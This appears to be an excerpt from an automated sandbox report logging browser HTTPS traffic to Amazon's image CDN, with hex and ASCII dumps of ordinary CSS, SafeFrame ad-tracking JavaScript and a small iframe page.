                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 63 68 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2c 2e 61 2d 74 6f 75 63 68 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 2d 6e 6f 2d 6a 73 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 76 69 65 77 70 6f 72 74 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 73 63 72 6f 6c 6c 7d 2e 61 2d 6e 6f 2d 6a 73 20 2e 66 65 65 64 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 2d 6c 74 2d 69 65 38 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 73 68 65 6c 66 7b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                                                                                                                                                                                        Data Ascii: ch .feed-carousel .feed-carousel-control,.a-touch .feed-carousel .feed-scrollbar{display:none}.a-no-js .feed-carousel .feed-carousel-viewport{overflow-x:scroll}.a-no-js .feed-scrollbar{display:none}.a-lt-ie8 .feed-carousel .feed-carousel-shelf{overflow:hi
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 20 2e 61 73 2d 74 69 74 6c 65 2d 64 69 76 69 64 65 72 7b 63 6f 6c 6f 72 3a 23 44 44 44 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 63 61 72 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 34 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 37 30 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 20 30 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61
                                                                                                                                                                                                        Data Ascii: er{display:none}.fresh-shoveler .as-title-divider{color:#DDD}.fresh-shoveler .feed-carousel-card{text-align:center;min-width:145px;max-width:270px;max-height:200px;overflow:hidden;margin:0 10px 0 0;position:relative}.fresh-shoveler .feed-carousel .feed-ca
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 31 35 30 70 78 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 2d 74 61 62 6c 65 74 2d 61 70 70 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 2d 74 61 62 6c 65 74 2d 61 70 70 20 2e 61 73 2d 74 69 74 6c 65 2d 62 6c 6f 63 6b 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 20 30 20 35 70 78 20 31 35 70 78 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 2d 74 61 62 6c 65 74 2d 61 70 70 20 2e 61 73 2d 74 69 74 6c 65 2d 62 6c 6f 63 6b 20 2e 61 2d 63 6f 6c 6f 72 2d 62 61 73 65 7b 63 6f 6c 6f 72 3a 23 34 34 34 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 2d 74 61 62 6c 65 74 2d 61 70 70 20 2e 61 73 2d
                                                                                                                                                                                                        Data Ascii: 150px}.fresh-shoveler-tablet-app{padding:10px 0}.fresh-shoveler-tablet-app .as-title-block{white-space:nowrap;overflow:hidden;margin:0 0 5px 15px}.fresh-shoveler-tablet-app .as-title-block .a-color-base{color:#444!important}.fresh-shoveler-tablet-app .as-
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 61 70 70 20 2e 70 72 6f 64 75 63 74 2d 6c 69 6e 6b 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 2d 74 61 62 6c 65 74 2d 61 70 70 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 7b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 69 6e 69 74 69 61 6c 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 2d 74 61 62 6c 65 74 2d 61 70 70 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 63 61 72 64 20 2e 70 72 6f 64 75 63 74 2d 69 6d 61 67 65 7b 77 69 64 74 68 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 32 31 35 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 35 70 78 3b
                                                                                                                                                                                                        Data Ascii: app .product-link{max-height:3em;overflow:hidden}.fresh-shoveler-tablet-app .feed-carousel{height:auto;min-height:initial}.fresh-shoveler-tablet-app .feed-carousel .feed-carousel-card .product-image{width:auto;height:auto;max-width:215px;max-height:165px;


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        16192.168.2.449762151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC616OUTGET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1373INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 48888
                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                        X-Amz-IR-Id: 46daee71-1e80-4bd2-8a0a-6255bc1c8421
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:39 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 23646
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:57 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200147-IAD, cache-ewr-kewr1740057-EWR
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 3a 22 29 7d 2c 69 3d 2f 28 5c 2f 62 7c 5c 2f 73 7c 5c 2f 6c 29 2e 2a 28 6e 6f 64 65 3d 29 28 5c 64 7b 31 2c 31 32 7d 29 2f 2c 6e 3d 6e 65 77 20 4d 61 70 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 2e 68 61 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 76 61 72 20 65 3d 69 2e 65 78 65 63 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 3d 65 26 26 65 5b 33 5d 3f 65 5b 33 5d 3a 6e 75 6c 6c 3b 6e 2e 73 65 74 28
                                                                                                                                                                                                        Data Ascii: (()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 20 45 72 72 6f 72 28 65 29 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 69 66 28 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 43 6f 6e 74 65 6e 74 22 2c 7b 65 6c 65 6d 65 6e 74 3a 65 7d 29 28 22 6d 61 72 6b 22 2c 74 2c 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 67 65 74 54 69 6d 65 28 29 29 7d 63 61 74 63 68 28 6e 29 7b 75 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6d 61 72 6b 27 20 43 53 41 22 2c 6e 29 7d 7d 3b 63 6c 61 73 73 20 79 7b 73 65 6e 64 4c 61 74 65 6e 63 79 4d 65 74 72 69 63 28 7b 6c 61 74 65 6e 63 79 4d 65 74 72 69 63 54 79 70 65 3a 65 2c 70 6c 61 63 65 6d 65 6e 74 49 64 3a 74 2c 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 3a 69 2c 70 6c 61 63 65 6d 65 6e 74 44 69 76 49 64 3a 6e 2c 74 69 6d
                                                                                                                                                                                                        Data Ascii: Error(e)},g=function(e,t,i){if(window.csa)try{window.csa("Content",{element:e})("mark",t,null==i?void 0:i.getTime())}catch(n){u("Error with 'mark' CSA",n)}};class y{sendLatencyMetric({latencyMetricType:e,placementId:t,placementName:i,placementDivId:n,tim
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 65 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 6b 65 79 28 65 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 74 61 72 74 73 57 69 74 68 28 41 29 29 7b 63 6f 6e 73 74 20 69 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 74 29 3b 69 66 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 74 29 2c 65 3d 2d 31 2c 6e 75 6c 6c 3d 3d 3d 69 29 63 6f 6e 74 69 6e 75 65 3b 79 69 65 6c 64 5b 74 2c 69 5d 7d 7d 7d 7d 63 6f 6e 73 74 20 44 3d 28 65 2c 74 2c 69 29 3d 3e 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 45 28 65 2c 74 29 2c 69 29 7d 2c 4d 3d 28 65 2c 74 2c 69 29 3d 3e 28 2e 2e 2e 6e 29 3d 3e 7b 74 72 79 7b 65 28 2e 2e 2e 6e 29 7d 63 61 74 63 68 28
                                                                                                                                                                                                        Data Ascii: e++){const t=localStorage.key(e);if(null==t?void 0:t.startsWith(A)){const i=localStorage.getItem(t);if(localStorage.removeItem(t),e=-1,null===i)continue;yield[t,i]}}}}const D=(e,t,i)=>{localStorage.setItem(E(e,t),i)},M=(e,t,i)=>(...n)=>{try{e(...n)}catch(
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 28 4f 28 65 29 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 29 2c 69 29 7d 3b 70 28 65 2c 69 2e 69 64 2c 6e 29 2c 70 28 65 2c 73 28 69 2e 69 64 29 2c 6e 29 2c 70 28 65 2c 74 28 69 2e 6e 61 6d 65 29 2c 6e 29 2c 70 28 65 2c 6f 28 74 28 69 2e 6e 61 6d 65 29 29 2c 6e 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 69 2c 6e 2c 61 2c 6f 2c 73 2c 72 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 21 57 28 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 7b 7d 2c 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 2e 63 73 6d 43 61 63 68 65 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 77 69
                                                                                                                                                                                                        Data Ascii: (O(e),":").concat(t),i)};p(e,i.id,n),p(e,s(i.id),n),p(e,t(i.name),n),p(e,o(t(i.name)),n)},H=function(e,t){var i,n,a,o,s,r;if(void 0===t&&(t=1),!W())return window.safeframe=null!==(i=window.safeframe)&&void 0!==i?i:{},window.safeframe.csmCache=null!==(n=wi
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 69 66 72 61 6d 65 3a 69 6e 6e 65 72 68 74 6d 6c 3a 65 78 69 73 74 22 29 3a 28 48 28 22 67 65 74 69 66 72 61 6d 65 3a 61 64 6d 61 70 3a 69 66 72 61 6d 65 3a 69 6e 6e 65 72 68 74 6d 6c 3a 75 6e 64 65 66 69 6e 65 64 22 29 2c 69 5b 74 5d 2e 69 66 72 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 7c 7c 48 28 22 67 65 74 69 66 72 61 6d 65 3a 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 3a 75 6e 64 65 66 69 6e 65 64 22 29 29 3a 48 28 22 67 65 74 69 66 72 61 6d 65 3a 61 64 6d 61 70 3a 69 66 72 61 6d 65 3a 75 6e 64 65 66 69 6e 65 64 22 29 3b 72 65 74 75 72 6e 20 69 5b 74 5d 2e 69 66 72 61 6d 65 7d 2c 71 3d 5b 7b 70 3a 35 30 2c 74 3a 32 2c 64 65
                                                                                                                                                                                                        Data Ascii: iframe:innerhtml:exist"):(H("getiframe:admap:iframe:innerhtml:undefined"),i[t].iframe=document.getElementById(a),document.getElementById(a)||H("getiframe:getElementById:undefined")):H("getiframe:admap:iframe:undefined");return i[t].iframe},q=[{p:50,t:2,de
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 2c 69 2e 62 29 2d 69 2e 74 29 2c 72 3d 6f 2a 73 2f 28 69 2e 68 2a 4d 61 74 68 2e 6d 69 6e 28 69 2e 77 2c 61 29 29 3b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 4d 61 74 68 2e 6d 69 6e 28 31 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 72 29 29 2e 74 6f 46 69 78 65 64 28 32 29 29 7d 28 65 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 22 75 6e 6b 6e 6f 77 6e 22 3a 74 3e 3d 2e 35 7d 2c 69 65 3d 65 3d 3e 30 3d 3d 3d 65 2e 77 69 64 74 68 26 26 30 3d 3d 3d 65 2e 68 65 69 67 68 74 3b 63 6f 6e 73 74 20 6e 65 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 59 28 29 2c 69 3d 4a 28 29 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 65 28 65 2e 74 2c 65 2e 62 2c 69 29 29 2c 61 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 65 28 65 2e 6c 2c 65 2e 72 2c 74 29 29 2c 6f 3d 6e 2a 61 2c 73 3d 65
                                                                                                                                                                                                        Data Ascii: ,i.b)-i.t),r=o*s/(i.h*Math.min(i.w,a));return Number(Math.min(1,Math.max(0,r)).toFixed(2))}(e);return null==t?"unknown":t>=.5},ie=e=>0===e.width&&0===e.height;const ne=e=>{const t=Y(),i=J(),n=Math.max(0,re(e.t,e.b,i)),a=Math.max(0,re(e.l,e.r,t)),o=n*a,s=e
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 58 2d 65 2e 6f 72 69 67 69 6e 61 6c 53 63 72 6f 6c 6c 58 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 69 2c 62 6f 74 74 6f 6d 3a 6e 2c 6c 65 66 74 3a 61 2c 72 69 67 68 74 3a 61 2b 65 2e 61 64 57 69 64 74 68 2c 77 69 64 74 68 3a 65 2e 61 64 57 69 64 74 68 2c 68 65 69 67 68 74 3a 65 2e 61 64 48 65 69 67 68 74 7d 7d 2c 70 65 3d 22 62 74 72 5f 63 6c 69 65 6e 74 22 2c 68 65 3d 22 63 6f 64 5f 63 6c 69 65 6e 74 22 2c 75 65 3d 22 6c 6f 63 61 6c 73 74 6f 72 61 67 65 5f 69 6d 70 72 65 73 73 69 6f 6e 22 2c 77 65 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 72 65 74 75 72 6e 20 69 2e 69 64 3d 65 2c 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79
                                                                                                                                                                                                        Data Ascii: indow.scrollX-e.originalScrollX);return{top:i,bottom:n,left:a,right:a+e.adWidth,width:e.adWidth,height:e.adHeight}},pe="btr_client",he="cod_client",ue="localstorage_impression",we=(e,t)=>{const i=document.createElement("img");return i.id=e,i.style.display
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 72 6f 6d 54 6f 70 24 2f 67 2e 65 78 65 63 28 65 29 3b 69 66 28 21 4d 65 28 65 29 29 7b 69 66 28 65 2e 6d 61 74 63 68 28 22 5b 5e 3a 5d 2b 3a 2e 2b 22 29 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 73 70 6c 69 74 28 22 3a 22 29 2c 6e 3d 74 5b 31 5d 2c 61 3d 74 2e 6c 65 6e 67 74 68 3e 32 3f 74 5b 32 5d 3a 6e 3b 69 66 28 69 29 72 65 74 75 72 6e 20 61 77 61 69 74 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 50 2e 77 68 65 6e 28 61 2c 22 41 22 29 2e 65 78 65 63 75 74 65 28 65 29 29 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 4e 65 65 64 20 41 55 49 20 6f 72 20 41 6d 61 7a 6f 6e 4a 51 20 69 6e 73 74 61 6c 6c 65 64 22 29 7d 72 65 74 75 72 6e 20 65 2e 6d 61 74 63 68 28 2f 5e 5c 64 7b 31 2c 34 7d 70 78 24 2f 67 29 3f 61 77 61 69 74 20 50 65 28 70 61 72
                                                                                                                                                                                                        Data Ascii: romTop$/g.exec(e);if(!Me(e)){if(e.match("[^:]+:.+")){const t=e.split(":"),n=t[1],a=t.length>2?t[2]:n;if(i)return await new Promise((e=>P.when(a,"A").execute(e)));throw new Error("Need AUI or AmazonJQ installed")}return e.match(/^\d{1,4}px$/g)?await Pe(par
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1378INData Raw: 22 2b 74 2e 69 64 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 69 7d 2c 7b 65 6e 74 3a 22 61 6c 6c 22 7d 29 7d 63 61 74 63 68 28 6e 29 7b 75 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6c 6f 67 43 73 61 45 76 65 6e 74 27 20 43 53 41 22 2c 6e 29 7d 7d 2c 5f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 45 76 65 6e 74 73 22 2c 7b 70 72 6f 64 75 63 65 72 49 64 3a 22 61 64 70 6c 61 63 65 6d 65 6e 74 73 22 7d 29 28 22 6c 6f 67 22 2c 7b 73 63 68 65 6d 61 49 64 3a 22 41 70 65 53 61 66 65 66 72 61 6d 65 2e 63 73 61 45 76 65 6e 74 2e 31 22 2c 6d 65 74 72 69 63 4e 61 6d 65 3a 65 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 74 7d 2c 7b
                                                                                                                                                                                                        Data Ascii: "+t.id,metricValue:i},{ent:"all"})}catch(n){u("Error with 'logCsaEvent' CSA",n)}},_e=function(e,t){if(void 0===t&&(t=1),window.csa)try{window.csa("Events",{producerId:"adplacements"})("log",{schemaId:"ApeSafeframe.csaEvent.1",metricName:e,metricValue:t},{


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        17192.168.2.449761151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC613OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        Origin: https://www.amazon.ae
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 167
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        X-Amz-IR-Id: 9989c84c-d92a-4437-93c1-a28cf89f9497
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:36 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 605615
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:57 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000154-IAD, cache-nyc-kteb1890021-NYC
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:57 UTC167INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 66 2d 31 2e 35 30 2e 31 36 37 35 35 65 30 62 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
